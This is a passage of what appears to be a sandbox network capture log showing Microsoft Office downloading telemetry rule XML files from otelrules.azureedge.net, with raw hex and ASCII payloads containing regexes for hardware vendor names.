20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120625" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <SR T="2" R="([Ff][Uu][Jj][Ii][Tt][Ss][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
32	192.168.2.4	49785	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:02 UTC	192	OUT	GET /rules/rule120624v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:02 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:02 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT ETag: "0x8DC582BB7010D66" x-ms-request-id: 7f7db364-701e-005c-2f05-2dbb94000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031302Z-16547b76f7fr4g8xhC1DFW9cqc00000006ng00000000smz8 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:02 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120624" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120623" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
33	192.168.2.4	49787	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:02 UTC	192	OUT	GET /rules/rule120627v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:02 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:02 GMT Content-Type: text/xml Content-Length: 404 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:54 GMT ETag: "0x8DC582B9E8EE0F3" x-ms-request-id: 75035ba1-b01e-005c-42fb-2c4c66000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031302Z-16547b76f7f7rtshhC1DFWrtqn00000007hg00000000g4hx x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:02 UTC	404	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 4e 6e 5d 5b 45 65 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20 20 3c 53 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120627" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120625" /> <SR T="2" R="^([Nn][Ee][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true"> <S

Session ID	Source IP	Source Port	Destination IP	Destination Port
34	192.168.2.4	49788	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:02 UTC	192	OUT	GET /rules/rule120628v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:02 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:02 GMT Content-Type: text/xml Content-Length: 468 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:51 GMT ETag: "0x8DC582B9C8E04C8" x-ms-request-id: 57f8276b-001e-000b-7658-2e15a7000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031302Z-17df447cdb5g2j9ghC1DFWev0800000003pg000000005wn0 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:02 UTC	468	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120628" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
35	192.168.2.4	49789	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:03 UTC	192	OUT	GET /rules/rule120630v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:03 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:03 GMT Content-Type: text/xml Content-Length: 499 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:45 GMT ETag: "0x8DC582B98CEC9F6" x-ms-request-id: 8b5c7529-c01e-00ad-2446-2ea2b9000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031303Z-15869dbbcc68l9dbhC1DFWr9fg00000001400000000090vq x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:03 UTC	499	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120630" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
36	192.168.2.4	49792	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:03 UTC	192	OUT	GET /rules/rule120632v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:03 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:03 GMT Content-Type: text/xml Content-Length: 471 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:33 GMT ETag: "0x8DC582BB5815C4C" x-ms-request-id: 47d81796-701e-0021-2403-2d3d45000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031303Z-16547b76f7f7lhvnhC1DFWa2k000000007bg00000000ppp5 x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:03 UTC	471	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120632" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
37	192.168.2.4	49790	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:03 UTC	192	OUT	GET /rules/rule120629v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:03 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:03 GMT Content-Type: text/xml Content-Length: 428 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:17 GMT ETag: "0x8DC582BAC4F34CA" x-ms-request-id: 9f11ee7d-201e-0096-73f2-2cace6000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031303Z-16547b76f7fp46ndhC1DFW66zg00000007qg000000000xuz x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:03 UTC	428	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 32 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4d 6d 5d 5b 49 69 5d 5b 43 63 5d 5b 52 72 5d 5b 4f 6f 5d 2d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 52 72 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120629" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120627" /> <SR T="2" R="([Mm][Ii][Cc][Rr][Oo]-[Ss][Tt][Aa][Rr])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"

Session ID	Source IP	Source Port	Destination IP	Destination Port
38	192.168.2.4	49791	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:03 UTC	192	OUT	GET /rules/rule120631v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:03 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:03 GMT Content-Type: text/xml Content-Length: 415 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT ETag: "0x8DC582B988EBD12" x-ms-request-id: 0e31b739-001e-002b-304d-2e99f2000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031303Z-15869dbbcc6qwghvhC1DFWssds0000000420000000007pkv x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:03 UTC	415	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 32 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 48 68 5d 5b 55 75 5d 5b 41 61 5d 5b 57 77 5d 5b 45 65 5d 5b 49 69 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120631" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120629" /> <SR T="2" R="([Hh][Uu][Aa][Ww][Ee][Ii])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tru

Session ID	Source IP	Source Port	Destination IP	Destination Port
39	192.168.2.4	49793	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:03 UTC	192	OUT	GET /rules/rule120633v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:03 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:03 GMT Content-Type: text/xml Content-Length: 419 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:29 GMT ETag: "0x8DC582BB32BB5CB" x-ms-request-id: d33f60ae-f01e-0085-74ec-2b88ea000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031303Z-16547b76f7f76p6chC1DFWctqw00000007s0000000002enr x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:03 UTC	419	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 53 73 5d 5b 41 61 5d 5b 4d 6d 5d 5b 53 73 5d 5b 55 75 5d 5b 4e 6e 5d 5b 47 67 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120633" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120631" /> <SR T="2" R="([Ss][Aa][Mm][Ss][Uu][Nn][Gg])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O=

Session ID	Source IP	Source Port	Destination IP	Destination Port
40	192.168.2.4	49795	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:04 UTC	192	OUT	GET /rules/rule120636v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:04 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:04 GMT Content-Type: text/xml Content-Length: 472 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT ETag: "0x8DC582B9D43097E" x-ms-request-id: 99f7ed0d-701e-0050-604a-2f6767000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031304Z-15869dbbcc6vr5dxhC1DFWqn64000000027000000000ea0f x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:04 UTC	472	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120636" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120635" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
41	192.168.2.4	49797	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:04 UTC	192	OUT	GET /rules/rule120635v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:04 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:04 GMT Content-Type: text/xml Content-Length: 420 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:25:53 GMT ETag: "0x8DC582B9DAE3EC0" x-ms-request-id: 9b119710-001e-0014-385c-2e5151000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031304Z-17df447cdb5jg4kthC1DFWux4n00000003sg00000000cadt x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:04 UTC	420	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 54 74 5d 5b 4f 6f 5d 5b 53 73 5d 5b 48 68 5d 5b 49 69 5d 5b 42 62 5d 5b 41 61 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120635" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <SR T="2" R="^([Tt][Oo][Ss][Hh][Ii][Bb][Aa])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O

Session ID	Source IP	Source Port	Destination IP	Destination Port
42	192.168.2.4	49794	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:04 UTC	192	OUT	GET /rules/rule120634v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:04 UTC	470	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:04 GMT Content-Type: text/xml Content-Length: 494 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:38 GMT ETag: "0x8DC582BB8972972" x-ms-request-id: 0a8e697d-a01e-0002-295f-2e5074000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031304Z-15869dbbcc6lxrkghC1DFWp3wc00000008f000000000192m x-fd-int-roxy-purgeid: 0 X-Cache: TCP_HIT Accept-Ranges: bytes
2024-11-07 03:13:04 UTC	494	IN	Data Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 33 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 33 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120634" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120633" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />

Session ID	Source IP	Source Port	Destination IP	Destination Port
43	192.168.2.4	49796	13.107.246.45	443

Timestamp	Bytes transferred	Direction	Data
2024-11-07 03:13:04 UTC	192	OUT	GET /rules/rule120637v0s19.xml HTTP/1.1 Connection: Keep-Alive Accept-Encoding: gzip User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro) Host: otelrules.azureedge.net
2024-11-07 03:13:04 UTC	491	IN	HTTP/1.1 200 OK Date: Thu, 07 Nov 2024 03:13:04 GMT Content-Type: text/xml Content-Length: 427 Connection: close Cache-Control: public, max-age=604800, immutable Last-Modified: Tue, 09 Apr 2024 00:26:12 GMT ETag: "0x8DC582BA909FA21" x-ms-request-id: ceff4d6f-101e-007a-10c7-2c047e000000 x-ms-version: 2018-03-28 x-azure-ref: 20241107T031304Z-16547b76f7fr28cchC1DFWnuws00000007p000000000c8vz x-fd-int-roxy-purgeid: 0 X-Cache-Info: L1_T2 X-Cache: TCP_HIT Accept-Ranges: bytes
